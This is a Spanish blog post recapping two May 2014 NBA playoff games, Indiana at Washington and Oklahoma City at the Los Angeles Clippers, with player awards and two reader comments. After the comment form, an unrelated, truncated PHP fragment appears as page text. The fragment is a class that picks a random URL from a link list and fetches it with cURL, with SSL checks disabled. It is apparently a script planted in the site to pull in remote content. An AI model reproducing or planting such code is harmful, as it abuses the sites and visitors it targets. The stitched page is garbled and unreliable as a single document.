La Crónica: Reconquista

10 de May de 2014 por TheDeerHunter

Dos victorias visitantes que suponen la recuperación de la ventaja campo. Son playoffs atípicos en los que se están viendo más victorias foráneas que nunca aunque al final de la fiesta el calor del público propio demostró ser un factor clave en la mayoría de los séptimos partidos de primera ronda.

En Washington volvimos a ver algo parecido a la gran defensa de Indiana de inicio del curso, o directamente colapso monumental de los Wizards en un partido feísimo. Los 63 puntos suponen un récord negativo de la franquicia, 49 de ellos en estático con un acierto del 32.9%. Hay días en los que conviene no levantarse de la cama. Roy Hibbert volvió a ser el muro que le llevó a ser considerado en la pugna por el DPY, especialmente para los hombres interiores de los Wizards. Los Pacers, sin cuajar una actuación particularmente brillante, pudieron abrir una cómoda ventaja en la segunda parte. Paul George volvió a ser su hombre más incisivo con 23 puntos.

En Los Angeles precioso intercambio de golpes durante los tres primeros cuartos. En el último, tener un MVP valió de algo en esta ocasión. Los Clippers no lograron sujetar a Durant en ningún momento. Los Thunder además se encontraron con la extraordinaria aportación de su segunda unidad, así como el mejor partido de Ibaka de lo que llevamos de postemporada y el habitual buen hacer de Westbrook. Por los Clippers no sirvió con el monumental partido de Griffin, que exigió incluso su sangre. Tampoco el del primer hombre capaz de firmar +20 puntos, +15 asistencias y ninguna pérdida desde Magic Johnson. Hablamos por supuesto de CP3 y es la segunda vez que lo hace. Buen partido también de Crawford para celebrar su premio de mejor sexto… pero se echó de menos a Reddick, a Collison junto al resto del banco y, sobre todo, una defensa algo más sólida propuesta por el zorro Rivers. Fiarlo todo a la ruleta rusa del talento con gente como Durant y Westbrook en frente no siempre puede salir bien.

PREMIOS

MVP: Stockton y Malone, Jordan y Pippen, Kevin Durant y Russell Westbrook… Parejas que han pasado o pasarán a la historia. Ayer la de los Thunder anotó 59 puntos, cogió 16 rebotes y repartió 19 asistencias. Difícil de superar.

Sorpresa: Los 2 de siempre fueron los mejores de Oklahoma pero anoche Serge Ibaka jugó un gran partido. Sólo falló un lanzamiento de los 9 que intentó (acabó con 20 puntos) y cogió 6 rebotes, todo a pesar de jugar buena parte del partido con problemas de faltas y tener que defender a Blake Griffin.

Decepción: Seguramente Nene prefería la versión inoperante de Roy Hibbert de la 1ª ronda. Ayer el brasileño fue totalmente superado (como el resto de sus compañeros) y se quedó con solo 8 puntos (3 de 14 en TC) y 3 rebotes. JJ Redick no pudo mantener el nivel de anteriores partidos y se quedó en 5 puntos.

Esfuerzo en vano: Blake Griffin (34p – 8r – 4a) y Chris Paul (21p – 16a) plantaron cara a los Thunder pero sucumbieron en el último cuarto. 2ª ocasión que Paul consigue más de 20 puntos, 15 asistencias y 0 pérdidas en un partido de playoffs.

Comenta

2 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Ya le han dado la vuelta. El primer partido los visitantes tuvieron la suerte de cara en el T3, pero no es algo que vaya a mantenerse siempre.

    La vida sigue igual. Ahora a ver si se ponen 2-2 o 3-1 y ya se finiquita al 5º. Las semis están siendo más sencillas que la primera ronda, porque los buenos se meten más en modo PO.

      Citar

  2. Ruxixon dice:
    #2

    Defendía la presencia de Jordan el otro día,como medida anti Westbrook,pero con Perkins en cancha.El buen hacer de Butler da a Oklahoma un small ball muy peligroso,y ahí DeAndre está totalmente perdido,de hecho es él quien se encarga de defender a Butler ¿?¿ y de estar pendiente de las ayudas.Perdido en defensa y sin ser aprovechado en ataque Doc tendría que pensar en otra cosa.Por otra parte me gustaría ver más a Granger,cogiendo los minutos de Dudley,que está para servir en un McDonald’s y no para defender a Durant.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>